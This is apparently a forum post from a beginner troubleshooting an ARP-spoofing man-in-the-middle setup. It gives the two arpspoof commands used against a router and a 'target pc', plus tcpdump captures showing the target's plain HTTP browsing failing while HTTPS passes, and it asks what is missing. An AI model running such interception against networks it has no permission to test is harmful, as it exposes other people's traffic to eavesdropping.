let me say ive never used this before so pardon my ignorance, however i was wise enough to grab the updated binary that was posted so that is not the problem atleast.

i set up arpspoof like this

arpspoof -i wlan0 -t 192.168.2.1 192.168.2.100
and in another window
arpspoof -i wlan0 -t 192.168.2.100 192.168.2.1
then i run tcpdump and i can see the arp reply's

then i do a google ping on my target pc "192.168.2.100" it goes through however when i try and browse the net it doesn't work, i can see the requests in tcpdump but i can never pull up a webpage.

00:48:01.053507 IP sec-b269.lan.1418 > yx-in-f100.google.com.www: S 2956512268:2956512268(0) win 16384 <mss 1460,nop,nop,sackOK>
00:48:01.070491 IP yx-in-f100.google.com.www > sec-b269.lan.1418: R 0:0(0) ack 2956512269 win 0
00:48:01.055000 IP bt.lan.34167 > 192.168.2.1.domain: 3555+ PTR? 100.45.125.74.in-addr.arpa. (44)
00:48:01.063738 IP 192.168.2.1.domain > bt.lan.34167: 3555 1/0/0 (79)
00:48:01.064030 IP bt.lan.45457 > 192.168.2.1.domain: 46687+ PTR? 169.2.168.192.in-addr.arpa. (44)
00:48:01.070365 IP 192.168.2.1.domain > bt.lan.45457: 46687* 1/0/0 (70)
00:48:01.070688 IP bt.lan.35805 > 192.168.2.1.domain: 25155+ PTR? 1.2.168.192.in-addr.arpa. (42)
00:48:01.077575 IP 192.168.2.1.domain > bt.lan.35805: 25155 NXDomain* 0/0/0 (42)
00:48:01.077984 IP bt.lan.43208 > 192.168.2.1.domain: 52318+ PTR? 219.2.168.192.in-addr.arpa. (44)
00:48:01.085986 IP 192.168.2.1.domain > bt.lan.43208: 52318* 1/0/0 (64)
00:48:01.611730 IP sec-b269.lan.1418 > yx-in-f100.google.com.www: S 2956512268:2956512268(0) win 16384 <mss 1460,nop,nop,sackOK>
00:48:01.611803 IP yx-in-f100.google.com.www > sec-b269.lan.1418: R 0:0(0) ack 1 win 0
00:48:02.044235 IP sec-b269.lan.1418 > yx-in-f100.google.com.www: S 2956512268:2956512268(0) win 16384 <mss 1460,nop,nop,sackOK>
Except i can pull up a page if its ssl

00:46:14.724420 IP sec-b269.lan.1397 > iw-in-f147.google.com.https: P 3542415966:3542416883(917) ack 1928679510 win 16143
00:46:19.835162 IP bt.lan > sec-b269.lan: ICMP redirect iw-in-f147.google.com to host 192.168.2.1, length 556
00:46:19.885191 IP sec-b269.lan.1397 > iw-in-f147.google.com.https: P 0:917(917) ack 1 win 16143
00:46:14.725700 IP bt.lan.54571 > 192.168.2.1.domain: 51856+ PTR? 147.95.125.74.in-addr.arpa. (44)
00:46:14.813748 IP 192.168.2.1.domain > bt.lan.54571: 51856 1/0/0 (79)
00:46:14.814119 IP bt.lan.44840 > 192.168.2.1.domain: 43478+ PTR? 169.2.168.192.in-addr.arpa. (44)
00:46:14.859934 IP iw-in-f147.google.com.https > sec-b269.lan.1397: . ack 917 win 10318
and i checked my iptabels but doing a iptables -L i get this

Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
and im not even sure if any of this info is helpful to diagnose my prob, if its not just tell me what you would like and ill post it asap

i thought i had a understanding of what i was doing but now not so much =\

am i missing something?